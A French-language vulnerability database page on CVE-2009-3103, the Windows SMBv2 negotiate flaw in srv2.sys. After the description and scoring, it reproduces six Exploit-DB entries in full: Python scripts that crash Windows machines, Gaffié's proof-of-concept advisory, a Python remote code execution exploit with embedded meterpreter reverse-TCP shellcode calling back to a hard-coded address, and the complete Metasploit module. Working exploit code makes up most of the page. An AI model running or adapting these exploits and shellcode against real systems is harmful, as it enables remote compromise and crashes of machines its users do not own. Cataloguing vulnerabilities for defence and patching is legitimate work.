CVE-2009-3103 : Détail

CVE-2009-3103

92.11%V4
Network
2009-09-08
20h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 12524

Date de publication : 2010-05-06 22h00 +00:00
Auteur : Jelmer de Hen
EDB Vérifié : Yes

#!/usr/bin/python # === EDIT – this exploit appears to be exactly the same one of one which was already found # and fixed notified by Laurent Gaffié, i did not know this but his blog post can be found here: # http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html import socket,sys,time print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600" print "Written by Jelmer de Hen" print "Published at http://h.ackack.net/?p=387" smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM) smb.bind(("", 445)) smb.listen(1) smbconn, addr = smb.accept() print "[+] "+str(addr)+" is trying to make connection to us over port 445" while 1: new_packet = smbconn.recv(1024) print "[+] Waiting for a negotiate request packet" if new_packet[8]=="r": print "[+] Received the negotiate request packet injecting the 4 bytes now..." smbconn.send("\x00\x00\x00\x01") break print "[+] Closing connection... This is part of the exploit" smbconn.close() print "[+] Done, if all went good then the box on the other side crashed"
Exploit Database EDB-ID : 10005

Date de publication : 2009-11-10 23h00 +00:00
Auteur : laurent gaffie
EDB Vérifié : Yes

#!/usr/bin/python # win7-crash.py: # Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop) # Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop. #NO BSOD, YOU GOTTA PULL THE PLUG. #To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash #Author: Laurent Gaffi� import SocketServer packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a.. "\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41" "\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00" "\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01" "\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20" "\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e" "\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a") class SMB2(SocketServer.BaseRequestHandler): def handle(self): print "Who:", self.client_address print "THANKS SDL" input = self.request.recv(1024) self.request.send(packet) self.request.close() launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445 launch.serve_forever()
Exploit Database EDB-ID : 9594

Date de publication : 2009-09-08 22h00 +00:00
Auteur : laurent gaffie
EDB Vérifié : Yes

============================================= - Release date: September 7th, 2009 - Discovered by: Laurent Gaffié - Severity: High ============================================= I. VULNERABILITY ------------------------- Windows Vista, Server 2008 < R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND ------------------------- Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 for more details. III. DESCRIPTION ------------------------- [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue: KB942624 (MS07-063) Installing only this specific update on Vista SP0 create the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT ------------------------- Smb-Bsod.py: #!/usr/bin/python #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error from socket import socket host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT ------------------------- An attacker can remotly crash any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED ------------------------- [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC. VII. SOLUTION ------------------------- No patch available for the moment. Close SMB feature and ports, until a patch is provided. Configure your firewall properly You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx VIII. REFERENCES ------------------------- http://www.microsoft.com/technet/security/advisory/975497.mspx http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com X. REVISION HISTORY ------------------------- September 7th, 2009: Initial release September 11th, 2009: Revision 1.0 release XI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII.Personal Notes ------------------------- Many persons have suggested to update this advisory for RCE and not BSOD: It wont be done, if they find a way to execute code, they will publish them advisory. # milw0rm.com [2009-09-09]
Exploit Database EDB-ID : 40280

Date de publication : 2016-02-25 23h00 +00:00
Auteur : ohnozzy
EDB Vérifié : No

# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py #!/usr/bin/python #This module depends on the linux command line program smbclient. #I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python. #The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter. import tempfile import sys import subprocess from socket import socket from time import sleep from smb.SMBConnection import SMBConnection try: target = sys.argv[1] except IndexError: print '\nUsage: %s <target ip>\n' % sys.argv[0] print 'Example: MS36299.py 192.168.1.1 1\n' sys.exit(-1) #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python shell = "" shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" #fce8820000006089e531c0648b shell += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" shell += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" shell += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" shell += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" shell += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" shell += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" shell += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" shell += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" shell += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" shell += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" shell += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" shell += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" shell += "\xff\xd5\x6a\x05\x68\xc0\xa8\x1e\x4d\x68\x02\x00\x01" shell += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" shell += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" shell += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec" shell += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02" shell += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a" shell += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" shell += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" shell += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40" shell += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57" shell += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9" shell += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0" shell += "\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" shell += "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" shell += "\x53\xff\xd5" host = target, 445 buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42" buff+="\x72\x00\x00\x00\x00\x18\x53\xc8" buff+="\x17\x02" #high process ID buff+="\x00\xe9\x58\x01\x00\x00" buff+="\x00\x00\x00\x00\x00\x00\x00\x00" buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02" buff+="\x04\x0d\xdf\xff"*25 buff+="\x00\x02\x53\x4d" buff+="\x42\x20\x32\x2e\x30\x30\x32\x00" buff+="\x00\x00\x00\x00"*37 buff+="\xff\xff\xff\xff"*2 buff+="\x42\x42\x42\x42"*7 buff+="\xb4\xff\xff\x3f" #magic index buff+="\x41\x41\x41\x41"*6 buff+="\x09\x0d\xd0\xff" #return address #stager_sysenter_hook from metasploit buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01" buff+="\x00\x00\x59\x0f\x32\x89\x46\x5d" buff+="\x8b\x7e\x61\x89\xf8\x0f\x30\xb9" buff+="\x16\x02\x00\x00\xf3\xa4\xfb\xf4" buff+="\xeb\xfd\xe8\xdd\xff\xff\xff\x6a" buff+="\x00\x9c\x60\xe8\x00\x00\x00\x00" buff+="\x58\x8b\x58\x54\x89\x5c\x24\x24" buff+="\x81\xf9\xde\xc0\xad\xde\x75\x10" buff+="\x68\x76\x01\x00\x00\x59\x89\xd8" buff+="\x31\xd2\x0f\x30\x31\xc0\xeb\x31" buff+="\x8b\x32\x0f\xb6\x1e\x66\x81\xfb" buff+="\xc3\x00\x75\x25\x8b\x58\x5c\x8d" buff+="\x5b\x69\x89\x1a\xb8\x01\x00\x00" buff+="\x80\x0f\xa2\x81\xe2\x00\x00\x10" buff+="\x00\x74\x0e\xba\x00\xff\x3f\xc0" buff+="\x83\xc2\x04\x81\x22\xff\xff\xff" buff+="\x7f\x61\x9d\xc3\xff\xff\xff\xff" buff+="\x00\x04\xdf\xff\x00\x04\xfe\x7f" buff+="\x60\x6a\x30\x58\x99\x64\x8b\x18" buff+="\x39\x53\x0c\x74\x2b\x8b\x43\x10" buff+="\x8b\x40\x3c\x83\xc0\x28\x8b\x08" buff+="\x03\x48\x03\x81\xf9\x6c\x61\x73" buff+="\x73\x75\x15\xe8\x07\x00\x00\x00" buff+="\xe8\x0d\x00\x00\x00\xeb\x09\xb9" buff+="\xde\xc0\xad\xde\x89\xe2\x0f\x34" buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff" buff+=shell s = socket() s.connect(host) s.send(buff) s.close() #Trigger the above injected code via authenticated process. subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)
Exploit Database EDB-ID : 14674

Date de publication : 2010-08-16 22h00 +00:00
Auteur : Piotr Bania
EDB Vérifié : No

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference --------------------------------------------------------------------- Exploited by Piotr Bania // www.piotrbania.com Exploit for Vista SP2/SP1 only, should be reliable! Tested on: Vista sp2 (6.0.6002.18005) Vista sp1 ultimate (6.0.6001.18000) Kudos for: Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace. Special kudos for prdelka for testing this shit and all the hosters. Sample usage ------------ > smb2_exploit.exe 192.167.0.5 45 0 > telnet 192.167.0.5 28876 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32> When all is done it should spawn a port TARGET_IP:28876 RELEASE UPDATE 08/2010: ---------------------- This exploit was created almost a year ago and wasnt modified from that time whatsoever. The vulnerability itself is patched for a long time already so i have decided to release this little exploit. You use it for your own responsibility and im not responsible for any potential damage this thing can cause. Finally i don't care whether it worked for you or not. P.S the technique itself is described here: http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html =========================================================================== Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14674.zip (smb2_exploit_release.zip)
Exploit Database EDB-ID : 16363

Date de publication : 2010-07-02 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB include Msf::Exploit::KernelMode def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', 'Description' => %q{ This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw. }, 'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9669 $', 'References' => [ [ 'MSB', 'MS09-050' ], [ 'CVE', '2009-3103' ], [ 'BID', '36299' ], [ 'OSVDB', '57799' ], [ 'URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html' ], [ 'URL', 'http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'StackAdjustment' => -3500, 'DisableNops' => true, 'EncoderType' => Msf::Encoder::Type::Raw, 'ExtendedOptions' => { 'Stager' => 'stager_sysenter_hook', } }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Vista SP1/SP2 and Server 2008 (x86)', { 'Platform' => 'win', 'Arch' => [ ARCH_X86 ], 'Ret' => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :) 'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address). 'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer 'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 07 2009' )) register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class) end # Not reliable enough for automation yet def autofilter false end def exploit print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." ) connect # we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest # and srv2!SrvProcPartialCompleteCompoundedRequest dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ] data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b) data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 data += [ 0x42424242 ].pack("V") * 7 # Unused data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E) data += [ 0x41414141 ].pack("V") * 6 # Unused data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2 data += payload.encoded # Our ring0 -> ring3 shellcode # We gain code execution by returning into the SMB packet, begining with its header. # The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX" # This will cause an access violation if executed as we can never set EBX to a valid pointer. # To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42. # This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer. # We patch the Signature1 value to be a jump forward into our shellcode. packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE packet['Payload']['SMB'].v['Flags1'] = 0x18 packet['Payload']['SMB'].v['Flags2'] = 0xC853 packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh'] packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload. packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ... packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 ) packet['Payload'].v['Payload'] = data packet = packet.to_s print_status( "Sending the exploit packet (#{packet.length} bytes)..." ) sock.put( packet ) wtime = datastore['WAIT'].to_i print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." ) stime = Time.now.to_i poke_logins = %W{Guest Administrator} poke_logins.each do |login| begin sec = connect(false) sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1)) rescue ::Exception => e sec.socket.close end end while( stime + wtime > Time.now.to_i ) select(nil, nil, nil, 0.25) break if session_created? end handler disconnect end end

Products Mentioned

Configuraton 0

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version sp2

    Microsoft>>Windows_server_2008 >> Version sp2

      Microsoft>>Windows_vista >> Version *

      Microsoft>>Windows_vista >> Version *

      Microsoft>>Windows_vista >> Version *

      Références

      http://www.securityfocus.com/bid/36299
      Tags : vdb-entry, x_refsource_BID
      http://www.kb.cert.org/vuls/id/135940
      Tags : third-party-advisory, x_refsource_CERT-VN
      http://blog.48bits.com/?p=510
      Tags : x_refsource_MISC
      http://www.us-cert.gov/cas/techalerts/TA09-286A.html
      Tags : third-party-advisory, x_refsource_CERT
      http://secunia.com/advisories/36623
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.securitytracker.com/id?1022848
      Tags : vdb-entry, x_refsource_SECTRACK
      http://www.exploit-db.com/exploits/9594
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://osvdb.org/57799
      Tags : vdb-entry, x_refsource_OSVDB